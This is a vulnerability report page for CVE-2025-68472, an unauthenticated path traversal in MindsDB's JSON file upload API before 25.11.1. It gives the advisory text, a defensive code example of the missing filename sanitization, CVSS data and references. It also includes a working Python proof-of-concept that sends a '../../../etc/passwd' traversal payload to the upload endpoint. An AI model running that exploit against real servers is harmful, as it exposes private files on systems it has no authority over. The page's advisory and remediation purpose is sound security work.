Security Vulnerability Report
CVE-2025-68472 CVSS 8.1 HIGH

CVE-2025-68472

Published: 2026-01-12 17:15:53
Last Modified: 2026-02-20 17:25:51

Description

MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 25.11.1, an unauthenticated path traversal in the file upload API lets any caller read arbitrary files from the server filesystem and move them into MindsDB’s storage, exposing sensitive data. The PUT handler in file.py directly joins user-controlled data into a filesystem path when the request body is JSON and source_type is not "url". Only multipart uploads and URL-sourced uploads receive sanitization; JSON uploads lack any call to clear_filename or equivalent checks. This vulnerability is fixed in 25.11.1.
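The description pins the flaw to one branch: the JSON PUT path joins original_filename into a storage path without the clear_filename treatment that multipart and URL uploads receive. The following is an added illustration, not MindsDB's code: a minimal model of that handler branch showing the unsafe join beside a sanitize-then-verify version. The storage root, the request bodies and the clean_filename sanitizer are constructed for the example; MindsDB's real clear_filename and storage layout are not reproduced.

```python
import json
import os

# Constructed storage root for the demo; MindsDB's real storage layout is
# not modelled here (assumption).
STORAGE_ROOT = "/srv/app/storage"

# Constructed request bodies, shaped like the JSON branch the description
# refers to (source_type other than "url", plus name and original_filename).
MALICIOUS_BODY = json.dumps({
    "source_type": "files",
    "name": "test",
    "original_filename": "../../../etc/passwd",
})
BENIGN_BODY = json.dumps({
    "source_type": "files",
    "name": "sales",
    "original_filename": "sales-2025.csv",
})
EMPTY_AFTER_CLEAN_BODY = json.dumps({
    "source_type": "files",
    "name": "x",
    "original_filename": "..",
})


def unsafe_join(storage_root, original_filename):
    """The vulnerable pattern: user-controlled data joined straight into a
    path. normpath shows where the '../' segments land (POSIX paths)."""
    return os.path.normpath(os.path.join(storage_root, original_filename))


def clean_filename(name):
    """Hypothetical sanitizer standing in for the project's clear_filename
    (its real implementation is not reproduced). Keeps only the last path
    component, normalises backslashes, drops everything outside a
    conservative allow-list and refuses names that sanitize to nothing
    (e.g. "..", which would otherwise still mean 'parent directory')."""
    base = os.path.basename(name.replace("\\", "/"))
    cleaned = "".join(ch for ch in base if ch.isalnum() or ch in "._-")
    cleaned = cleaned.lstrip(".")
    if not cleaned:
        raise ValueError("filename is empty after sanitization")
    return cleaned


def safe_join(storage_root, original_filename):
    """Sanitize, then verify containment as defense in depth: the resolved
    destination must sit directly inside the resolved storage root. realpath
    also follows symlinks, so a link inside the storage directory that
    points elsewhere is rejected too."""
    root = os.path.realpath(storage_root)
    dest = os.path.realpath(os.path.join(root, clean_filename(original_filename)))
    if os.path.dirname(dest) != root:
        raise ValueError("destination escapes storage root: %s" % dest)
    return dest


def plan_json_upload(body, storage_root=STORAGE_ROOT):
    """Model of the JSON branch of an upload handler with the missing
    sanitization applied. Returns where the file would be written or raises
    ValueError; it performs no filesystem writes."""
    data = json.loads(body)
    if data.get("source_type", "files") == "url":
        # URL-sourced uploads take a separate, already-sanitized branch
        # according to the advisory; not modelled here.
        raise ValueError("url uploads are handled elsewhere")
    name = data.get("name")
    original = data.get("original_filename")
    if not isinstance(name, str) or not isinstance(original, str):
        raise ValueError("name and original_filename must be strings")
    return {"name": name, "dest": safe_join(storage_root, original)}


if __name__ == "__main__":
    print("unsafe:", unsafe_join(STORAGE_ROOT, "../../../etc/passwd"))
    print("safe:  ", plan_json_upload(MALICIOUS_BODY))
```

The containment check in safe_join is deliberately redundant with the sanitizer: if a later change lets a separator through, or an attacker-controlled symlink sits inside the storage directory, the realpath plus dirname comparison still refuses the write. Rejecting a name that sanitizes to an empty string matters because ".." would otherwise survive a naive basename call.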

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mindsdb:mindsdb:*:*:*:*:*:*:*:* - VULNERABLE
MindsDB < 25.11.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests

# CVE-2025-68472 PoC - MindsDB Path Traversal File Read
# Target: MindsDB server < 25.11.1
TARGET_URL = "http://{target}:47334/api/file/upload"


def exploit_path_traversal(target_ip):
    """
    Exploit the unauthenticated path traversal vulnerability in MindsDB
    file upload API to read arbitrary files.
    """
    url = TARGET_URL.format(target=target_ip)
    headers = {"Content-Type": "application/json"}
    # Payload to read /etc/passwd via path traversal
    # The vulnerable code joins user-controlled filename to filesystem path
    payload = {
        "source_type": "files",  # Not 'url', triggers vulnerable code path
        "name": "test",
        "original_filename": "../../../etc/passwd",  # Path traversal payload
    }
    try:
        response = requests.put(url, headers=headers, json=payload, timeout=10)
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response: {response.text}")
        # Check if file was successfully moved to MindsDB storage
        if response.status_code == 200:
            data = response.json()
            print(f"[+] File moved to storage: {data}")
            return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
    return False


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "localhost"
    exploit_path_traversal(target)
```

References

https://github.com/mindsdb/mindsdb/security/advisories/GHSA-qqhf-pm3j-96g7 (Exploit, Vendor Advisory)
https://www.bluerock.io/post/cve-2025-68472-mindsdb-file-upload-path-traversal

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-68472", "sourceIdentifier": "[email protected]", "published": "2026-01-12T17:15:52.887", "lastModified": "2026-02-20T17:25:50.507", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 25.11.1, an unauthenticated path traversal in the file upload API lets any caller read arbitrary files from the server filesystem and move them into MindsDB’s storage, exposing sensitive data. The PUT handler in file.py directly joins user-controlled data into a filesystem path when the request body is JSON and source_type is not \"url\". Only multipart uploads and URL-sourced uploads receive sanitization; JSON uploads lack any call to clear_filename or equivalent checks. This vulnerability is fixed in 25.11.1."}, {"lang": "es", "value": "MindsDB es una plataforma para construir inteligencia artificial a partir de datos empresariales. Antes de la versión 25.11.1, un salto de ruta no autenticado en la API de carga de archivos permite a cualquier llamador leer archivos arbitrarios del sistema de archivos del servidor y moverlos al almacenamiento de MindsDB, exponiendo datos sensibles. El manejador PUT en file.py une directamente datos controlados por el usuario en una ruta del sistema de archivos cuando el cuerpo de la solicitud es JSON y source_type no es 'url'. Solo las cargas multipart y las cargas con origen en URL reciben saneamiento; las cargas JSON carecen de cualquier llamada a clear_filename o comprobaciones equivalentes. Esta vulnerabilidad está corregida en 25.11.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-23"}, {"lang": "en", "value": "CWE-36"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mindsdb:mindsdb:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.11.1", "matchCriteriaId": "3B7E2336-7EE3-4597-A6C6-FAA24532F38C"}]}]}], "references": [{"url": "https://github.com/mindsdb/mindsdb/security/advisories/GHSA-qqhf-pm3j-96g7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://www.bluerock.io/post/cve-2025-68472-mindsdb-file-upload-path-traversal", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
```